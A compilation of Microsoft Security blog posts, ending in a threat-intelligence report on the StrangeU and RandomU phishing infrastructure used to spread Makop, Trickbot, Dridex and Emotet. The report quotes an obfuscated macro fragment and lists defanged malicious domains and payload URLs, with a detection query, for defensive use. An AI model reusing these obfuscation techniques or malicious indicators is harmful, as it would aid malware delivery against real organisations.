Dataguise is a sensitive data discovery and protection software that now integrates with Microsoft Information Protection. More specifically, it performs context-aware discovery of structured, unstructured, and semi-structured data, and can use the results of that discovery to report on data classification, tag data with Microsoft Information Protection-readable labels, and protect sensitive data either natively—via innumerable methods of masking, encryption, and monitoring—or by integrating with Microsoft Information Protection or a third-party data protection solution. It’s a highly scalable solution that relies on machine learning and other heuristics to allow for efficient, accurate data discovery in multi-petabyte, hybrid environments.

With Dataguise, discovery can be done at several levels to meet various risk, compliance, or data governance goals; but there are two kinds of discovery that are of particular interest here, and it’s important to distinguish them:

  1. Discovery of personal information and other sensitive data: This is the process of finding and reporting data governed by PII, PCI, PHI, and any similar policy, where all sensitive data needs to be discovered but not associated with an individual. Such requirements are typically driven by industry security standards or regulations.
  2. Identity-based data discovery: This is the process of finding and reporting data specifically related to an individual. The contents of the report may or may not be useful for directly identifying the associated individual, but the entirety of a report constitutes the breadth of information that an enterprise possesses about the given data subject. Identity-based discovery is typically driven by recent data privacy laws like GDPR in the EU, CCPA in California, and LGPD in Brazil.

A data protection strategy that takes both types of discovery into account and incorporates technologies to perform them accurately, efficiently, and comprehensively—can add value not only for information security or privacy teams but for risk, compliance, governance, analytics, marketing, and IT operations teams as well. When you think of all the ways an organization collects, uses, shares, and stores data across the enterprise, more granular visibility leads to more precise control and, therefore, greater business flexibility and agility to maximize data value.

Ultimately, Dataguise complements Microsoft Information Protection capabilities, making the combination extremely useful for the customer.

The discovery synergy: Dataguise augments Microsoft Information Protection scanning capabilities

Dataguise’s real strength lies in the fact that it can discover and report sensitive and personal data across relational databases, NoSQL databases, Hadoop, file shares, cloud stores like ADLS, S3, and GCS, and over 200 different cloud-based applications. Therefore, Dataguise primarily can extend Microsoft Information Protection’s scanning coverage to structured and unstructured data stored outside Microsoft products to the ones mentioned above. This is a game-changer, as Microsoft Information Protection can now be used to tag all co-located sensitive and personal data on all co-located platforms.

The protection synergy: Dataguise enhances downstream data protection capabilities for Microsoft Information Protection

 Dataguise uses Microsoft Information Protection’s SDK to seamlessly integrate discovery with Microsoft Information Protection’s tagging capability. Whether the tags power DLP, access control, or encryption and decryption solutions, Dataguise can either natively or by leveraging a third-party solution, team up with Microsoft Information Protection to create an end-to-end data protection strategy and automated implementation.

So how does this all work?

The integration is seamless and starts with defining the tags in Microsoft Information Protection. Then, there is a mapping of these tags to one or a combination of sensitive elements, out-of-the-box or custom in Dataguise. As Dataguise runs its discovery scans, it is using that mapping to report tags corresponding to each file that it has scanned. Now, using the Microsoft Information Protection SDK, these tags are applied to the corresponding file. Dataguise discovery uses context-aware discovery based on machine learning, which benefits Microsoft Information Protection by tagging files accurately and at scale. The figure below shows the flow:

An infographic that shows the flow of context-aware discovery based on machine learning.

Dataguise and Microsoft Information Protection bring a powerful combination of capabilities to any data protection strategy and implementation. The joint value of this integration lies in the fact that Dataguise can cover a broad range of platforms for discovery, and then leverage Microsoft Information Protection labeling to enable downstream data protection. Intelligent and context-aware data discovery is foundational to data protection, and with accurate optics, enterprise-wide implementation of comprehensive and automated data protection policies can be achieved.

For more information about the Dataguise Sensitive Data Discovery and Protection solution, please visit You can also find Dataguise on the Azure Marketplace.

Learn more

To learn more about the Microsoft Intelligent Security Association (MISA), visit our website where you can learn about the MISA program, product integrations, and find MISA members. Visit the video playlist to learn about the strength of member integrations with Microsoft products.

For more information about Microsoft Security Solutions, visit the Microsoft Security website. Bookmark the Security blog to keep up with our expert coverage of security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Automating and operationalizing data protection with Dataguise and Microsoft Information Protection appeared first on Microsoft Security.

Modernizing your network security strategy

February 4th, 2021 No comments

From the global pandemic to recent cyberattacks, our world has faced many challenges during the past 12 months. Some of these challenges we can’t change. However, I’m pleased about the ones we can, and are changing across the cybersecurity landscape. For example, to facilitate remote work and maintain business continuity, organizations are moving more of their apps to the cloud and delivering SaaS experiences.

We know, however, that cybercriminals are taking advantage of this shift. We have seen them increase DDoS attacks, ransomware, and phishing campaigns. So how do you, as a cybersecurity professional help your organization facilitate remote work while strengthening security, reliability, and performance?

The first step is to examine your organization’s security strategy and adopt a Zero Trust approach.

Join me and Sinead O’Donovan, Director of Program Management for Azure Security, in the next Azure Security Experts Series on February 18, 2021, from 10:00 AM to 11:00 AM Pacific Time, as we’re going to focus on another important aspect of Zero Trust network security.

There, we’ll step through three strategies using the cloud-native network security services like Azure Front Door and Azure Firewall to perform:

  • Segmentation: This includes apps and virtual network segmentation which aims to reduce the attack surface and prevent attackers from moving laterally.
  • Encryption: Enforcing encryption on the communication channel between user-to-app or app-to-app with industry standards like TLS/SSL.
  • Threat protection: Employing threat intelligence to help minimize risk from the most sophisticated attacks like bots and malware.

You’ll have the opportunity to take deep dives and see demos on how to use Azure network security cloud-native services for:

  • Application security and acceleration: Utilize new integrated services like Azure Web Application Firewall and CDN technology to provide app security, scalability, and resiliency.
  • Advanced cloud network threat protection: Apply advanced firewall capabilities for highly sensitive and regulated environments.

In just one hour, you’ll learn new networking strategies, improve your app security and performance, use cutting-edge network threat protection, and stay ahead of a constantly evolving threat landscape.

Register now.

Learn more

To learn more about Microsoft Security solutions visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Modernizing your network security strategy appeared first on Microsoft Security.

Afternoon Cyber Tea: Privacy, the pandemic, and protecting our cyber future

February 3rd, 2021 No comments

Much of our everyday life has moved online with the pandemic continuing to play a role in how we work and communicate with others. This migration has meant that security and privacy continue to remain top-of-mind for both security professionals and those who may not have given these cyber issues a second thought once before.

In this episode of Afternoon Cyber Tea, I had a chance to talk about this impact with cybersecurity expert Theresa Payton, CEO of Fortalice Solutions and co-founder of Dark Cubed.

In our discussion, we focus on Theresa’s experience with election security, social engineering, and about her book “Manipulated: Inside the Cyberwar to Hijack Elections and Distort the Truth.” We also look at how the cyber operatives behind misinformation campaigns choose their targets, and how digital empathy and human-centered design can help combat cybercrime.

“Nation-state hackers invade social issues—such as fracking, elections, or vaccinations—all while posing as Americans,” Theresa explains. She recounts how, in researching her book, she found herself speaking to a group of Macedonian hackers who targeted the 2016 election, only to discover the hackers were apolitical. “We’re pro-capitalism,” they told her, explaining how they’d created detailed models that showed how much revenue they could earn by pushing certain candidates rather than others.

“Microsoft was one of the early leaders in offering free tools to help states improve their voting technology. They looked at something that could be a revenue generator, then chose to make it about the public good instead.”—Theresa Payton, CEO of Fortalice Solutions and co-founder of Dark Cubed

During our conversation, we talk about how social engineering attacks are often made easier by our own trusting natures, with vacation photos, birthdays, and other personal content providing the raw data hackers rely on. Since privacy settings for social media usually require users to opt-in, many users are unknowingly laying their online life out like a buffet for hackers. And, since many people don’t read the terms of service, they often have no idea what data is being collected, or what it’s being used for. Theresa mentions a study done by MIT researchers that found even anonymized data grabbed from phone records, credit card transactions, and mobile apps can be easily cross-referenced by zip code and gender to narrow the user’s identity to within just five people.

Theresa and I agree that people cannot be expected to be experts on cybersecurity or system designs, which is where digital empathy comes into play. As we get better at building security into systems, employees can be free to do what they were hired to do. “Microsoft has been leading the way in going passwordless,” Theresa says. “I’m excited that technology has finally caught up to our needs. Now we’ll only be limited by our own creative minds.”

Find out how Theresa went from working as a bank manager to handling cybersecurity at the George W. Bush White House and get some tips on how to protect yourself from social engineering schemes—listen to the full episode.

What’s next

In this ongoing podcast series, I talk with cybersecurity influencers about the evolving threat landscape and explore the promise of systems powered by AI, IoT) and other emerging tech. In every episode, we’ll look at how to empower people and organizations to create a more secure, productive digital environment.

Listen to Afternoon Cyber Tea with Ann Johnson on:

  • Apple Podcasts: You can also download the episode by clicking the Episode Website link.
  • Podcast One: Includes the option to subscribe—so you’re notified as soon as new episodes are available.
  • CISO Spotlight page: Listen alongside our CISO Spotlight episodes, where customers and security experts discuss similar topics such as Zero Trust, compliance, going passwordless, and more.

In the meantime, bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity. Or reach out to me on LinkedIn or Twitter if you have guest or topic suggestions.

The post Afternoon Cyber Tea: Privacy, the pandemic, and protecting our cyber future appeared first on Microsoft Security.

Recent enhancements for Microsoft Power Platform governance

February 1st, 2021 No comments

An emerging trend in digital transformation efforts has been the rise of low-code development platforms. Of course, these low-code platforms must be grounded in best-of-breed governance capabilities which include security and compliance features. Without strong governance, the full benefits of low-code development cannot be realized. It’s only natural that any low-code platform chosen by an organization must have strong security and compliance capabilities. Microsoft has developed the Power Platform which includes Power Apps, Power Automate, Power Virtual Agents, and Power BI to serve our customer’s needs for a robust low-code development platform that includes app development, automation, chatbots, and rich, detailed data analysis and visualization. We previously reported on the fundamental security and compliance capabilities offered with Microsoft Flow which was renamed Power Automate. In this blog, we’re going to discuss the integrated security and compliance capabilities across the Power Platform and provide an update on the new capabilities we’ve launched.

Foundations of governance

As the number of developers grows, governance becomes a key criterion to ensure digital transformation. As such, IT must create stronger guardrails to ensure the growing numbers of developers and the assets they create all remain compliant and secure. The Power Platform’s governance approach is multi-step with a focus on security, monitoring, administrative management, and application lifecycle management (figure 1). Check out our detailed governance and administration capabilities. The Power Platform also offers a Center of Excellence Starter Kit which organizations can use to evolve and educate employees on governance best practices. The Power Platform comes equipped with features that help reduce the complexity of governing your environment and empowers admins to unlock the greatest benefits from their Power Platform services. We’re reporting some of our newest capabilities to protect your organization’s data with tenant restrictions and blocking email exfiltration. We’re also announcing new analytics reports available for the robotic process automation (RPA) capability recently launched with Power Automate.

The Power Platform multi-step governance strategy

Figure 1: The Power Platform multi-step governance strategy.

Cross-tenant inbound and outbound restrictions using Azure Active Directory

The Power Platform offers access to over 400 connectors to today’s most popular enterprise applications. Connectors are proxies or wrappers around an API that allows the underlying service to ‘talk’ to Power Automate, Power Apps, and Azure Logic Apps. Control and access to these connectors and the data residing in the applications is a crucial aspect of a proactive governance and security approach. To this end, we have recently enhanced the cross-tenant inbound and outbound restrictions for Power Platform connectors. The Power Platform leverages Azure Active Directory (Azure AD) for controlling user authentication and access to data for important connectors such as Microsoft first-party services. While tenant restrictions can be created with Azure AD all up, enabling organizations to control access to software as a service (SaaS) cloud applications and services based on the Azure AD tenant used for single sign-on, they cannot target specific Microsoft services such as Power Platform exclusively. Organizations can opt to isolate the tenant for Azure AD-based connectors exclusively for Power Platform, using Power Platform’s tenant isolation capability. Power Platform tenant isolation works for connectors using Azure AD-based authentication such as Office 365 Outlook or SharePoint. Power Platform’s tenant isolation can be one way or two way depending on the specific use case. Tenant admins can also choose to allow one or more specific tenants in inbound or outbound direction for connection establishment while disallowing all other tenants. Learn more about tenant restrictions and tenant isolation. For now, this capability is available through support and will soon be available for admin self-service using Power Platform admin center.

In addition to leveraging Power Platform tenant isolation’s ability to prevent data exfiltration and infiltration for Azure AD-based connectors, admins can safeguard against connectors using external identity providers such as Microsoft account, Google, and much more—creating a data loss prevention policy that classifies the connector under the Blocked group.

Email exfiltration controls

Digital transformation has opened a variety of new communications channels. However, email remains the foundational method of digital communication and Microsoft Outlook continues as one of the dominant email services for enterprises. Preventing the exfiltration of sensitive data via email is crucial to maintaining enterprise data security. To this end, we have added the ability for Power Platform admins to prevent emails sent through Power Platform to be distributed to external domains. This is done by setting Exchange mail rules based on specific SMTP headers that are inserted in emails sent through Power Automate and Power Apps using the Microsoft 365 Exchange and Outlook connector. The SMTP headers can be used to create appropriate exfiltration (unauthorized transfer of data from one device to another) rules in Microsoft Exchange for outbound emails. For more details on these headers auto-inserted through Microsoft 365 Outlook connector, see SMTP headers. With the new controls, admins can easily block the exfiltration of forwarded emails and exempt specific flows (automated workflow created with Power Automate) or apps from exfiltration blocking. To block the exfiltration of forwarded emails, admins can set up Exchange mail flow rules to monitor or block emails sent by Power Automate and or Power Apps using the Microsoft 365 Outlook connector. Figure 2 is an example SMTP header for an email sent using Power Automate with the reserved word ‘Power Automate’ in the application header type.

Power Platform SMTP email header with reserved word ‘Power Automate’

Figure 2: Power Platform SMTP email header with reserved word ‘Power Automate.’

The SMTP header also includes the operation ID includes the type of email, which in figure 2 is a forwarded email. Exchange admins can use these headers to set up exfiltration blocking rules in the Exchange admin center. As you can see in figure 2, the SMTP header also includes a workflow identifier as the new ‘User-Agent’ header which is equal to the app or flow ID. Admins can exempt some flows (or apps) from the exfiltration due to the business scenario or use the workflow ID as part of the user-agent header to do the same. Learn more about how Power Platform helps admins prevent email exfiltration with these sophisticated new controls.

Powerful analytics for monitoring robotic process automation processes

One of the most exciting new capabilities offered with the Power Platform is Desktop Flows (previously known as UI flows) which provide robotic process automation (RPA)  available through Power Automate. Along with this powerful new feature, we have launched new analytics dashboards to ensure admins have full visibility with new RPA processes. Admins can view the overall status of automation that runs in the organization and monitor the analytics for automation that’s built with RPA automation from the Power Platform admin center. These analytics reports are accessible to users granted environment admin privilege. Admins can access the Power Platform admin center by clicking the Admin Center from the Power Automate portal settings menu. From the admin center, admins can access either Cloud flows (non-RPA automation) or Desktop flows. The Desktop flows page offers three types of reports:

  • Runs: Gives you an overview of daily, weekly, and monthly desktop flows run statics.
  • Usage: Usage of the different RPA processes.
  • Created: Analytics for recently created RPA processes.

Figure 3 shows an example of the new Runs report available in the admin center for Desktop flows. You can get more details on these powerful new analytics capabilities from our Microsoft docs page and our announcement blog. Check them both out.

New analytics ‘Run’ report for Desktop flows in Power Platform Admin Center

Figure 3: New analytics ‘Run’ report for Desktop flows in Power Platform admin center.

Join our community and get started today

Join the growing Power Platform community so you can get the latest updates, join discussions, and get ideas on how the Power Platform can help your organization. You can also learn how the products work from these learning modules available at Microsoft Learn. Be sure to check out some of our great assets which will get you more knowledgeable about the powerful tools available to ensure your organization benefits from low-code development with the Power Platform while adhering to some of the industry’s best compliance and security standards.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Recent enhancements for Microsoft Power Platform governance appeared first on Microsoft Security.

What tracking an attacker email infrastructure tells us about persistent cybercriminal operations

February 1st, 2021 No comments

From March to December 2020, we tracked segments of a dynamically generated email infrastructure that attackers used to send more than a million emails per month, distributing at least seven distinct malware families in dozens of campaigns using a variety of phishing lures and tactics. These campaigns aimed to deploy malware on target networks across the world, with notable concentration in the United States, Australia, and the United Kingdom. Attackers targeted the wholesale distribution, financial services, and healthcare industries.

By tracing these campaigns, we uncovered a sprawling infrastructure that is robust enough to seem legitimate to many mail providers, while flexible enough to allow the dynamic generation of new domain names and remain evasive. Shared IP space, domain generation algorithm (DGA) patterns, subdomains, registrations metadata, and signals from the headers of malicious emails enabled us to validate our research through overlaps in campaigns where attackers utilized multiple segments of purchased, owned, or compromised infrastructure. Using the intelligence we gathered on this infrastructure, we were at times able to predict how a domain was going to be used even before campaigns began.

This email infrastructure and the malware campaigns that use it exemplify the increasing sophistication of cybercriminal operations, driven by attackers who are motivated to use malware infections for more damaging, potentially more lucrative attacks. In fact, more recent campaigns that utilized this infrastructure distributed malware families linked to follow-on human-operated attacks, including campaigns that deployed Dopplepaymer, Makop, Clop, and other ransomware families.

Our deep investigation into this infrastructure brings to light these important insights about persistent cybercriminal operations:

  • Tracking an email infrastructure surfaces patterns in attacker activity, bubbling up common elements in seemingly disparate campaigns
  • Among domains that attackers use for sending emails, distributing malware, or command-and-control, the email domains are the most likely to share basic registration similarities and more likely to use DGA
  • Malware services rely on proxy providers to make tracking and attribution difficult, but the proxies themselves can provide insights into upcoming campaigns and improve our ability to proactively protect against them
  • Gaining intelligence on email infrastructures enables us to build or improve proactive and comprehensive protections like those provided by Microsoft Defender for Office 365 to defend against some of the world’s most active malware campaigns

While there is existing in-depth research into some of these specific campaigns, in this blog we’ll share more findings and details on how email distribution infrastructures drive some of the most prevalent malware operations today. Our goal is to provide important intelligence that hosting providers, registrars, ISPs, and email protection services can use and build on to protect customers from the threats of today and the future. We’ll also share insights and context to empower security researchers and customers to take full advantage of solutions like Microsoft Defender for Office 365 to perform deep investigation and hunting in their environment and make their organizations resilient against attacks.

The role of for-sale infrastructure services in the threat ecosystem

We spotted the first segment of the infrastructure in March, when multiple domains were registered using distinct naming patterns, including the heavy use of the word “strange”, inspiring the name StrangeU. In April, a second segment of the infrastructure, one that used domain generation algorithm (DGA), began registration as well. We call this segment RandomU.

The emergence of this infrastructure in March dovetailed with the disruption of the Necurs botnet that resulted in the reduction of service. Before being disrupted, Necurs was one of the world’s largest botnets and was used by prolific malware campaign operators such as those behind Dridex. For-sale services like Necurs enable attackers to invest in malware production while leasing the delivery components of their activities to further obfuscate their behavior. The StrangeU and RandomU infrastructure appear to fill in the service gap that the Necurs disruption created, proving that attackers are highly motivated to quickly adapt to temporary interruptions to their operations.

Graph showing timeline of the Necurs takedown and the staging and operation of StrangeU and RandomU

Figure 1. Timeline of staging and utilization of the email infrastructure

At first, the new email infrastructure was used infrequently in campaigns that distributed highly commodity malware like Mondfoxia and Makop. Soon, however, it attracted the attention of Dridex and Trickbot operators, who began using the infrastructure for portions of their campaigns, sometimes entirely and sometimes mixed with other compromised infrastructure or email providers.

Analyzing these mail clusters provides insight into how human the tangled web of modular attacker infrastructure remains. From unifying key traits in registration and behavior to the simple and effective techniques that the wide variety of malware uses, attackers’ goals in this diversification point toward combatting automated analysis. However, these same shared characteristics and methods translate to insights that inform resilient protections that defend customers against these attacks.

Domain registration and email infrastructure staging

On March 7, 2020, attackers began registering a series of domains with Namecheap using sets of stolen email addresses, largely from free email services like,,, and others. These domains all had similar characteristics that could be linked back to various similarities in registration. Almost all of the registered domains contained the word “strange” and were under the .us TLD, hence the name StrangeU. The use of .us TLD prevented domain or WHOIS privacy services—often used to obfuscate domain ownership and provenance—which are prohibited for this TLD.

To circumvent tracking and detection of these domains, attackers used false registration metadata. However, there was heavy crossover in the fake names and email addresses, allowing us to find additional domain names, some of which could be tied together using other keywords as shown in the list below, and fingerprint the domain generation mechanism.

The StrangeU domains were registered in early March 2020 and operated in continuous small bursts until April, when they were used for a large ransomware campaign. Following that, a new campaign occurred fairly regularly every few weeks. Registration of new domains continued throughout the year, and in September, the StrangeU infrastructure was used in conjunction with a similar infrastructure to deliver Dridex, after which these domains were used less frequently.

This second mailing segment, RandomU, employed a different DGA mechanism but still utilized Namecheap and showed a more consistent through line of registration metadata than its StrangeU counterpart. This infrastructure, which surfaced in April, was used infrequently through the Spring, with a surge in May and July. After the Dridex campaign in September in which it was used along with StrangeU, it has been used in two large Dridex campaigns every month.

Table listing observed patterns in StrangeU and RandomU infrastructures

Figure 2. Common patterns in domains belonging to the email infrastructure

The StrangeU and RandomU segments of domains paint a picture of supplementing modular mailing services that allowed attackers to launch region-specific and enterprise-targeting attacks at scale, delivering over six million emails. The two segments contained a standard barrage of mailing subdomains, with over 60 unique subdomains referencing email across clusters, consistent with each other, with each domain having four to five subdomains. The following is a sample of malware campaigns, some of which we discuss in detail in succeeding sections, that we observed this infrastructure was used for:

  • Korean spear-phishing campaigns that delivered Makop ransomware in April and June
  • Emergency alert notifications that distributed Mondfoxia in April
  • Black Lives Matter lure that delivered Trickbot in June
  • Dridex campaign delivered through StrangeU and other infra from June to July
  • Dofoil (SmokeLoader) campaign in August
  • Emotet and Dridex activities in September, October, and November

Timeline of campaigns using the StrangeU and RandomU infrastructures

Figure 3. Timeline of campaigns that used StrangeU and RandomU domains

Korean spear-phishing delivers Makop ransomware (April and June 2020)

In early April, StrangeU was used to deliver the Makop ransomware. The emails were sent to organizations that had major business operations in Korea and used names of Korean companies as display names. Signals from Microsoft Defender for Office 365 indicated that these campaigns ran in short bursts.

The emails had .zip attachments containing executables with file names that resembled resumes from job seekers. Once a user opened the attachments, the executables delivered Makop, a ransomware-as-a-service (RaaS) payload that targeted devices and backups.

Upon infection, the malware quickly used the WMI command-line (WMIC) utility and deleted shadow copies. It then used the BCEdit tool and altered the boot configuration to ignore future failures and prevent restoration before encrypting all files and renaming them with .makop extensions.

The second time we observed the campaign almost two months later, in early June, the attackers used a Makop ransomware variant with many modified elements, including added persistence via scripts in the Startup folder before triggering a reboot.

Nearly identical attempts to deliver Makop using resume-based lures were covered by Korean security media during the entire year, using popular mail services through legitimate vendors like Naver and Hanmail. This could indicate that during short bursts the Makop operators were unable to launch their campaigns through legitimate services and had to move to alternate infrastructures like StrangeU instead.

Black Lives Matter lure delivers Trickbot (June 2020)

One campaign associated with the StrangeU infrastructure gained notoriety in mid-June for its lure as well as for delivering the notorious info-stealing malware Trickbot. This campaign circulated emails with malicious Word documents claiming to seek anonymous input on the Black Lives Matter movement.

An initial version of this campaign was observed on June 10 sending emails from a separate, unique attacker-owned mailing infrastructure using .monster domains. However, in the next iteration almost two weeks later, the campaign delivered emails from various domains specifically created with the Black Lives Matter signage, interspersed with StrangeU domains:

  • b-lives-matter[.]site
  • blivesm[.]space
  • blivesmatter[.]site
  • lives-matter-b[.]xyz
  • whoslivesmatter[.]site
  • lives-m-b[.]xyz
  • ereceivedsstrangesecureworld[.]us
  • b-l-m[.]site

Both campaigns carried the same Trickbot payload, operated for two days, and used identical post-execution commands and callouts to compromised WordPress sites.

Once a user opened the document attachment and enabled the malicious macro, Word launched cmd.exe with the command “/c pause” to evade security tools that monitored for successive launches of multiple processes. It then launched commands that deleted proxy settings in preparation for connecting to multiple C2 IP addresses.

Screenshot of malicious document

Figure 4. Screenshot of the malicious document used to deliver Trickbot

The commands also launched rundll32.exe, a native binary commonly used as a living-off-the-land binary, to load a malicious file in memory. The commandeered rundll32.exe also proceeded to perform other tasks using other living-off-the-land binaries, including wermgr.exe and svchost.exe.

In turn, the hijacked wermgr.exe process dropped a file with a .dog extension that appeared to be the Trickbot payload. The same instance of wermgr.exe then appeared to inject code into svchost.exe and scanned for open SMB ports on other devices. The commandeered svchost.exe used WMI to open connections to additional devices on the network, while continuing to collect data from the initial infected device. It also opened multiple browsers on localhost connections to capture browser history and other information via esentutl.exe and grabber_temp.edb, both of which are often used by the Trickbot malware family.

This campaign overwhelmingly targeted corporate accounts in the United States and Canada and avoided individual accounts. Despite heavy media coverage, this campaign was relatively small, reflecting a common behavior among cybercrime groups, which often run multiple, dynamic low-volume campaigns designed to evade resilient detection.

Dridex campaigns big and small (June to July 2020 and beyond)

From late June through July, Dridex operators ran numerous campaigns that distributed Excel documents with malicious macros to infect devices. These operators first delivered emails through the StrangeU infrastructure only, but they quickly started to use compromised email accounts of legitimate organizations as well, preventing defenders from easily blocking deliveries. Despite this, emails from either StrangeU or the compromised accounts had overlapping attributes. For example, many of the emails used the same Reply To addresses that were sourced from compromised individual accounts and not consistent with the sender addresses.

During the bulk of this run, Excel files were attached directly in the email in order to eventually pull the Dridex payload from .xyz domains such as those below. The attackers changed the delivery domains every few days and connected to IP-based C2s on familiar ports like 4664, 3889, 691, and 8443:

  • yumicha[.]xyz
  • rocesi[.]xyz
  • secretpath[.]xyz
  • guruofbullet[.]xyz
  • Greyzone[.]xyz

When opened, the Excel document installed one of a series of custom Dridex executables downloaded from the attacker C2 sites. Like most variants in this malware family, the custom Dridex executables incorporated code loops, time delays, and environment detection mechanisms that evaded numerous public and enterprise sandboxes.

Dridex is known for its capability to perform credential theft and establish connectivity to attacker infrastructure. In this instance, the same Dridex payload was circulated daily using varying lures, often repeatedly to the same organizations to ensure execution on target networks.

During the longer and more stable Excel Dridex campaigns in June and July, a Dridex variant was also distributed in much smaller quantities utilizing Word documents over a one-day period, perhaps testing new evasion techniques. These Word documents, while still delivering Dridex, improved existing obfuscation methods using a unique combination of VBA stomping and replacing macros and function calls with arbitrary text. In a few samples of these documents, we found text from Shakespearean prose.

var farewell_and_moon = ["m","a","e","r","t","s",".","b","d","o","d","a"].reverse().join("")   
function as_thy_face(takes_from_hamlet)   
{return new ActiveXObject(takes_from_hamlet)}   

While Microsoft researchers didn’t observe this portion of the campaign moving into the human-operated phase—targets did not open the attachment—this campaign was likely to introduce tools like PowerShell Empire or Cobalt Strike to steal credentials, move laterally, and deploy ransomware.

Emotet, Dridex, and the RandomU infrastructure (September and beyond)

Despite an errant handful of deliveries distributing Dofoil (also known as SmokeLoader) and other malware, the vast majority of the remaining deliveries through StrangeU have been Dridex campaigns that reoccured every few weeks for a handful of days at a time. These campaigns started on September 7, when RandomU and StrangeU were notably used in a single campaign, after which StrangeU began to see less utilization.

These Dridex campaigns utilized an Emotet loader and initial infrastructure for hosting, allowing the attackers to conduct a highly modular email campaign that delivered multiple distinct links to compromised domains. These domains employed heavy sandbox evasion and are connected by a series of PHP patterns ending in a small subset of options: zxlbw.phpyymclv.phpzpsxxla.php, or app.php. As the campaigns continued, the PHP was dynamically generated, adding other variants, including vary.php, invoice.php, share.php, and many others. Some examples are below.

  • hxxps://molinolafama[.]com[.]mx/app[.]php
  • hxxps://meetingmins[.]com/app[.]php
  • hxxps://contrastmktg[.]com/yymclv[.]php
  • hxxps://idklearningcentre[.]com[.]ng/zxlbw[.]php
  • hxxps://idklearningcentre[.]com[.]ng/zpsxxla[.]php
  • hxxps://idklearningcentre[.]com[.]ng/yymclv[.]php
  • hxxps://hsa[.]ht/yymclv[.]php
  • hxxps://hsa[.]ht/zpsxxla[.]php
  • hxxps://hsa[.]ht/zxlbw[.]php
  • hxxps://contrastmktg[.]com/yymclv[.]php
  • hxxps://track[.]topad[.]co[.]uk/zpsxxla[.]php
  • hxxps://seoemail[.]com[.]au/zxlbw[.]php
  • hxxps://bred[.]fr-authentification-source-no[.]inaslimitada[.]com/zpsxxla[.]php
  • hxxp://www[.]gbrecords[.]london/zpsxxla[.]php
  • hxxp://autoblogsite[.]com/zpsxxla[.]php
  • hxxps://thecrossfithandbook[.]com/zpsxxla[.]php
  • hxxps://mail[.]168vitheyrealestate[.]com/zpsxxla[.]php

In this campaign, sandboxes were frequently redirected to unrelated sites like chemical manufacturers or medical suppliers, while users received an Emotet downloader within a Word document, which once again used macros to facilitate malicious activities.

Screenshot of malicious document

Figure 5. Screenshot of the malicious document used to deliver Dridex

The malicious macro utilized WMI to run a series of standard PowerShell commands. First, it downloaded the executable payload itself by contacting a series of C2 domains associated with Emotet campaigns since July. Afterward, additional encoded PowerShell commands were used in a similar fashion to download a .zip file that contained a Dridex DLL. Additional commands also reached out to a variety of Emotet infrastructure hosted on compromised WordPress administrative pages, even after the Dridex payload has already been downloaded. Dridex then modified RUN keys to automatically start the Dridex executable, which was renamed to riched20.exe on subsequent logons.

We also observed simultaneous connections to associated Dridex and Emotet infrastructure. These connections were largely unencrypted and occurred over a variety of ports and services, including ports 4664 and 9443. At this point the malware had firm presence on the machine, enabling attackers to perform human-operated activity at a later date.

In the past, reports have confirmed Dridex being delivered via leased Emotet infrastructure. There have also been many IP and payload-based associations. This research adds to that body of work and confirms additional associations via namespace, as well as correlation of email lure, metadata, and sender. This iteration of campaign repeated through October to December largely unchanged with nearly identical mails.

Defending organizations against malware campaigns

As attacks continue to grow in modularity, the tactics that attackers use to deliver phishing email, gain initial access on systems, and move laterally will continuously become more varied. This research shows that despite these disparities and the increased resiliency attackers have built, the core tactics and tools that they use are still limited in scope, relying repeatedly on familiar malicious macros, lures, and sending tactics.

Sweeping research into massive attacker infrastructures, as well as our real-time monitoring of malware campaigns and attacker activity, directly inform Microsoft security solutions, allowing us to build or improve protections that block malware campaigns and other email threats, both current and future, as well as provide enterprises with the tools for investigating and responding to email campaigns in real-time.

Microsoft delivers these capabilities through Microsoft Defender for Office 365. Features likes Safe attachments and Safe links ensure real-time, dynamic protection against email campaigns no matter the lure or evasion tactic. These features use a combination of detonation, automated analysis, and machine learning to detect new and unknown threats. Meanwhile, the Campaign view shows the complete picture of email campaigns as they happen, including timelines, sending patterns, impact to the organization, and details like IP addresses, senders, and URLs. These insights into email threats empower security operations teams to respond to attacks, perform additional hunting, and fix configuration issues.

Armed with an advanced solution like Microsoft Defender for Office 365 and the rest of technologies in the broader Microsoft 365 Defender solution, enterprises can further increase resilience against threats by following these recommendations:

  • Educate end users about protecting personal and business information in social media, filtering unsolicited communication, identifying lures in spear-phishing email, and reporting of reconnaissance attempts and other suspicious activity.
  • Configure Office 365 email filtering settings to ensure blocking of phishing & spoofed emails, spam, and emails with malware. Set Office 365 to recheck links on click and delete sent mail to benefit from newly acquired threat intelligence.
  • Disallow macros or allow only macros from trusted locations. See the latest security baselines for Office and Office 365.
  • Turn on AMSI for Office VBA.
  • Check perimeter firewall and proxy to restrict servers from making arbitrary connections to the internet to browse or download files. Turn on network protection to block connections to malicious domains and IP addresses. Such restrictions help inhibit malware downloads and command-and-control activity.

Turning on attack surface reduction rules, including rules that can block advanced macro activity, executable content, process creation, and process injection initiated by Office applications, also significantly improves defenses. The following rules are especially useful in blocking the techniques observed in campaigns using the StrangeU and RandomU infrastructure:

Microsoft 365 customers can also use the advanced hunting capabilities in Microsoft 365 Defender, which integrates signals from Microsoft Defender for Office 365 and other solutions, to locate activities and artifacts related to the infrastructure and campaigns discussed in this blog. These queries can be used with advanced hunting in Microsoft 365 security center, but the same regex pattern can be used on other security tools to identify or block emails.

This query searches for emails sent from StrangeUemail addresses. Run query

| where SenderMailFromDomain matches regex @"^(?:eraust|ereply|reply|ereceived|received|reaust|esend|inv|send|emailboost|eontaysstrange|eprop|frost|eont|servicply).*(strange|stange|emailboost).*\.us$"   
or SenderFromDomain matches regex @"^(?:eraust|ereply|reply|ereceived|received|reaust|esend|inv|send|emailboost|eontaysstrange|eprop|frost|eont|servicply).*(strange|stange|emailboost).*\.us$"

Learn how you can stop attacks through automated, cross-domain security and built-in AI with Microsoft Defender 365.



Indicators of compromise

StrangeU domains

esendsstrangeasia[.]us sendsstrangesecuretoday[.]us emailboostgedigital[.]us
emailboostgelife[.]us emailboostgelifes[.]us emailboostgesecureasia[.]us
eontaysstrangeasia[.]us eontaysstrangenetwork[.]us eontaysstrangerocks[.]us
